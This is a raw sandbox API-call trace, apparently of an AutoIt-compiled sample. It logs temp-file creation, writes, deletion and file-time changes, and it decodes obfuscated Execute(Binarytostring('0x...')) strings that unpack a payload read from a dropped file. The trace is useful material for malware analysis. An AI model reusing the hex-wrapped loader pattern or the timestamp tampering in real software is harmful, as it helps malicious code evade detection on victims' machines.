(lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\autDAA5.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\autdaa5.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x8ad98c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0133.220] GetFileType (hFile=0x164) returned 0x1 [0133.220] ReadFile (in: hFile=0x160, lpBuffer=0x241fed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8ad9b8, lpOverlapped=0x0 | out: lpBuffer=0x241fed8*, lpNumberOfBytesRead=0x8ad9b8*=0x6c7, lpOverlapped=0x0) returned 1 [0133.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1000) returned 0x25ceba8 [0133.220] WriteFile (in: hFile=0x164, lpBuffer=0x25ceba8*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x8abf3c, lpOverlapped=0x0 | out: lpBuffer=0x25ceba8*, lpNumberOfBytesWritten=0x8abf3c*=0x820, lpOverlapped=0x0) returned 1 [0133.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25ceba8 | out: hHeap=0x25c0000) returned 1 [0133.221] CloseHandle (hObject=0x164) returned 1 [0133.225] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\autDAA5.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\autdaa5.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x8ad978, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0133.225] GetFileType (hFile=0x164) returned 0x1 [0133.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d70 [0133.226] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\rngoajj" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\rngoajj"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x8ad978, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0133.227] GetFileType (hFile=0x168) returned 0x1 [0133.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1000) returned 0x25ceba8 [0133.227] ReadFile (in: hFile=0x164, lpBuffer=0x25ceba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8ad988, lpOverlapped=0x0 | out: lpBuffer=0x25ceba8*, lpNumberOfBytesRead=0x8ad988*=0x820, lpOverlapped=0x0) returned 1 [0133.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20000) returned 0x249f8f8 [0133.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x2400048 [0133.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24bf900 [0133.229] ReadFile (in: hFile=0x164, lpBuffer=0x2400860, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x8ad970, lpOverlapped=0x0 | out: lpBuffer=0x2400860*, lpNumberOfBytesRead=0x8ad970*=0x0, lpOverlapped=0x0) returned 1 [0133.230] WriteFile (in: hFile=0x168, lpBuffer=0x24bf900*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x8abeec, lpOverlapped=0x0 | out: lpBuffer=0x24bf900*, lpNumberOfBytesWritten=0x8abeec*=0x2000, lpOverlapped=0x0) returned 1 [0133.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1000) returned 0x24cf908 [0133.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f8f8 | out: hHeap=0x25c0000) returned 1 [0133.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400048 | out: hHeap=0x25c0000) returned 1 [0133.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24bf900 | out: hHeap=0x25c0000) returned 1 [0133.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25ceba8 | out: hHeap=0x25c0000) returned 1 [0133.236] CloseHandle (hObject=0x164) returned 1 [0133.236] WriteFile (in: hFile=0x168, lpBuffer=0x24cf908*, nNumberOfBytesToWrite=0xa7d, lpNumberOfBytesWritten=0x8abf24, lpOverlapped=0x0 | out: lpBuffer=0x24cf908*, lpNumberOfBytesWritten=0x8abf24*=0xa7d, lpOverlapped=0x0) returned 1 [0133.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24cf908 | out: hHeap=0x25c0000) returned 1 [0133.237] CloseHandle (hObject=0x168) returned 1 [0133.243] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\autDAA5.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\autdaa5.tmp")) returned 1 [0133.244] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\rngoajj" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\rngoajj"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0133.244] SetFileTime (hFile=0x168, lpCreationTime=0x8adb00, lpLastAccessTime=0x0, lpLastWriteTime=0x8adb08) returned 1 [0133.244] CloseHandle (hObject=0x168) returned 1 [0133.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241fed8 | out: hHeap=0x25c0000) returned 1 [0133.245] CloseHandle (hObject=0x160) returned 1 [0133.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498b78 | out: hHeap=0x25c0000) returned 1 [0133.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24988f0 | out: hHeap=0x25c0000) returned 1 [0133.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499058 | out: hHeap=0x25c0000) returned 1 [0133.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e48 | out: hHeap=0x25c0000) returned 1 [0133.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e18 | out: hHeap=0x25c0000) returned 1 [0133.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499010 | out: hHeap=0x25c0000) returned 1 [0133.245] PeekMessageW (in: lpMsg=0x8bf7b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7b8) returned 0 [0133.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499010 [0133.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249b9b0 [0133.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499010 | out: hHeap=0x25c0000) returned 1 [0133.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d980 [0133.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499010 [0133.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e18 [0133.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249b9c0 [0133.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249dd18 [0133.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e48 [0133.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb20 [0133.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e48 | out: hHeap=0x25c0000) returned 1 [0133.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249dd40 [0133.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e48 [0133.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499058 [0133.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499010 | out: hHeap=0x25c0000) returned 1 [0133.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499010 [0133.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24988f0 [0133.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc50 [0133.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249dc28 [0133.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498b78 [0133.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbe0 [0133.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498fb0 [0133.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f98 [0133.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc40 [0133.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499010 | out: hHeap=0x25c0000) returned 1 [0133.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499010 [0133.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e30 [0133.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc10 [0133.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ff8 [0133.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f08 [0133.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc70 [0133.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f80 [0133.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc70 | out: hHeap=0x25c0000) returned 1 [0133.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x117) returned 0x249c818 [0133.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc70 [0133.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f80 | out: hHeap=0x25c0000) returned 1 [0133.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x118) returned 0x241fed8 [0133.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc80 [0133.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x230) returned 0x241fff8 [0133.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc60 [0133.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x241fed8, cbMultiByte=280, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 280 [0133.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x230) returned 0x2420230 [0133.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x241fed8, cbMultiByte=280, lpWideCharStr=0x2420230, cchWideChar=280 | out: lpWideCharStr="Execute(Binarytostring('0x457865637574652842696E617279746F737472696E6728273078353337343732363936453637353337303643363937343238343636393643363535323635363136343238323434313332333233303330333033303334343333323332373337413546323932433237354433313335343432313237324333313239272929'))") returned 280 [0133.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420230 | out: hHeap=0x25c0000) returned 1 [0133.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f80 [0133.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241fed8 | out: hHeap=0x25c0000) returned 1 [0133.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc80 | out: hHeap=0x25c0000) returned 1 [0133.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c818 | out: hHeap=0x25c0000) returned 1 [0133.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc70 | out: hHeap=0x25c0000) returned 1 [0133.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f08 | out: hHeap=0x25c0000) returned 1 [0133.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ff8 | out: hHeap=0x25c0000) returned 1 [0133.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc10 | out: hHeap=0x25c0000) returned 1 [0133.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c818 [0133.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc10 [0133.247] CharUpperBuffW (in: lpsz="Execute", cchLength=0x7 | out: lpsz="EXECUTE") returned 0x7 [0133.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ff8 [0133.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2498f08 [0133.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2498ef0 [0133.247] CharUpperBuffW (in: lpsz="Binarytostring", cchLength=0xe | out: lpsz="BINARYTOSTRING") returned 0xe [0133.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2498de8 [0133.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2498ea8 [0133.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1a0) returned 0x2420230 [0133.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c818 | out: hHeap=0x25c0000) returned 1 [0133.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x350) returned 0x24203d8 [0133.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420230 | out: hHeap=0x25c0000) returned 1 [0133.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ec0 [0133.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249dc50 [0133.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ff8 | out: hHeap=0x25c0000) returned 1 [0133.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2498ff8 [0133.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e60 [0133.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ec0 | out: hHeap=0x25c0000) returned 1 [0133.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2498ec0 [0133.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2498f38 [0133.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2498f20 [0133.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc70 [0133.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e90 [0133.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499040 [0133.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc80 [0133.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498fe0 [0133.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498da0 [0133.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbb0 [0133.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498db8 [0133.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbb0 | out: hHeap=0x25c0000) returned 1 [0133.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7d) returned 0x249c818 [0133.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbb0 [0133.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498db8 | out: hHeap=0x25c0000) returned 1 [0133.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7e) returned 0x249c8a0 [0133.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc00 [0133.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xfc) returned 0x241fed8 [0133.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbd0 [0133.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x249c8a0, cbMultiByte=126, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 126 [0133.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xfc) returned 0x2420230 [0133.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x249c8a0, cbMultiByte=126, lpWideCharStr=0x2420230, cchWideChar=126 | out: lpWideCharStr="Execute(Binarytostring('0x537472696E6753706C69742846696C655265616428244132323030303034433232737A5F292C275D31354421272C3129'))") returned 126 [0133.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420230 | out: hHeap=0x25c0000) returned 1 [0133.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498db8 [0133.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c8a0 | out: hHeap=0x25c0000) returned 1 [0133.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc00 | out: hHeap=0x25c0000) returned 1 [0133.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c818 | out: hHeap=0x25c0000) returned 1 [0133.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbb0 | out: hHeap=0x25c0000) returned 1 [0133.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498da0 | out: hHeap=0x25c0000) returned 1 [0133.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498fe0 | out: hHeap=0x25c0000) returned 1 [0133.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc80 | out: hHeap=0x25c0000) returned 1 [0133.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c818 [0133.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc80 [0133.249] CharUpperBuffW (in: lpsz="Execute", cchLength=0x7 | out: lpsz="EXECUTE") returned 0x7 [0133.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498fe0 [0133.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2498da0 [0133.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2498e00 [0133.249] CharUpperBuffW (in: lpsz="Binarytostring", cchLength=0xe | out: lpsz="BINARYTOSTRING") returned 0xe [0133.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2498dd0 [0133.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2498968 [0133.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e78 [0133.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249dc78 [0133.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498fe0 | out: hHeap=0x25c0000) returned 1 [0133.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2498fe0 [0133.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498d70 [0133.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e78 | out: hHeap=0x25c0000) returned 1 [0133.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2498e78 [0133.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2498d88 [0133.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2498950 [0133.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbb0 [0133.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24990a0 [0133.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ed8 [0133.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc00 [0133.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f50 [0133.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24990d0 [0133.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc20 [0133.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499088 [0133.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc20 | out: hHeap=0x25c0000) returned 1 [0133.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x2465a78 [0133.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc20 [0133.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499088 | out: hHeap=0x25c0000) returned 1 [0133.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x31) returned 0x246d720 [0133.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc30 [0133.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x62) returned 0x2420230 [0133.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc90 [0133.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x246d720, cbMultiByte=49, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0133.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x62) returned 0x24202a0 [0133.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x246d720, cbMultiByte=49, lpWideCharStr=0x24202a0, cchWideChar=49 | out: lpWideCharStr="StringSplit(FileRead($A2200004C22sz_),']15D!',1)") returned 49 [0133.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202a0 | out: hHeap=0x25c0000) returned 1 [0133.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499088 [0133.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d720 | out: hHeap=0x25c0000) returned 1 [0133.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc30 | out: hHeap=0x25c0000) returned 1 [0133.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2465a78 | out: hHeap=0x25c0000) returned 1 [0133.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc20 | out: hHeap=0x25c0000) returned 1 [0133.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24990d0 | out: hHeap=0x25c0000) returned 1 [0133.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f50 | out: hHeap=0x25c0000) returned 1 [0133.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc00 | out: hHeap=0x25c0000) returned 1 [0133.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24202a0 [0133.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc00 [0133.251] CharUpperBuffW (in: lpsz="StringSplit", cchLength=0xb | out: lpsz="STRINGSPLIT") returned 0xb [0133.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f50 [0133.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24990d0 [0133.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24990e8 [0133.251] CharUpperBuffW (in: lpsz="FileRead", cchLength=0x8 | out: lpsz="FILEREAD") returned 0x8 [0133.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2498fc8 [0133.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2499118 [0133.251] CharUpperBuffW (in: lpsz="A2200004C22sz_", cchLength=0xe | out: lpsz="A2200004C22SZ_") returned 0xe [0133.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499028 [0133.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249dca0 [0133.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f50 | out: hHeap=0x25c0000) returned 1 [0133.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2498f50 [0133.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f68 [0133.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499028 | out: hHeap=0x25c0000) returned 1 [0133.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2499028 [0133.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2499178 [0133.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc20 [0133.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499160 [0133.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499100 [0133.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2499148 [0133.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499130 [0133.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499100 | out: hHeap=0x25c0000) returned 1 [0133.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0133.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249dca0 | out: hHeap=0x25c0000) returned 1 [0133.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2499100 [0133.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc30 [0133.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499070 [0133.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24990b8 [0133.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2499190 [0133.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24991a8 [0133.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499070 | out: hHeap=0x25c0000) returned 1 [0133.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc30 | out: hHeap=0x25c0000) returned 1 [0133.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc30 [0133.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499070 [0133.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24991c0 [0133.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb60 [0133.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 